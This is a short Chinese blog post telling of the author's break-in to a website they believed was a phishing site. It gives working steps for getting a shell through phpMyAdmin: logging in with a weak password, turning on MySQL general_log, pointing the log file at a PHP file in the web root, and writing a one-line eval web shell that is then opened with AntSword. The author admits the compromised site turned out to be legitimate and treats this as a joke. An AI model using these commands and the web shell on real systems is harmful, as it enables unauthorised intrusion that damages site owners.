记录一次搞笑的拿站经历......

记录个人经验

起因…在论坛上看到一个钓鱼站 直接手起刀落的扫目录

扫出了…如下

 

一顿猛如虎的操作  进去了 别问我怎么进 问就是弱口令

 

phpmyadmin getshell方法

根目录地址自己找方法吧爆破什么的很多网上

 

查看日志状态 

show variables  like  '%general%'; 日志读写是开着的 ON是表示开启OFF表示关闭

要是 general_log OFF 那就用语句SET GLOBAL general_log='on'

开启日志读写

 

创建文件

SET GLOBAL general_log_file='C:/phpStudy/www/xxx.php'

写一句户 SELECT '<?php eval($_POST["cmd"]);?>'

 

然后就连接蚁剑

刚开始连接蚁剑乱码才知道编码没设置要设置为base64

 

尴尬的事  本来想搞钓鱼站的 后来才发现把人家正规站给拿下了 才想起接口钓鱼站已经挂了 尴尬

 

记录个人经验

标签：GLOBAL,log,记录,搞笑,......,钓鱼,general,SET,日志
来源： https://www.cnblogs.com/judgecx/p/12719948.html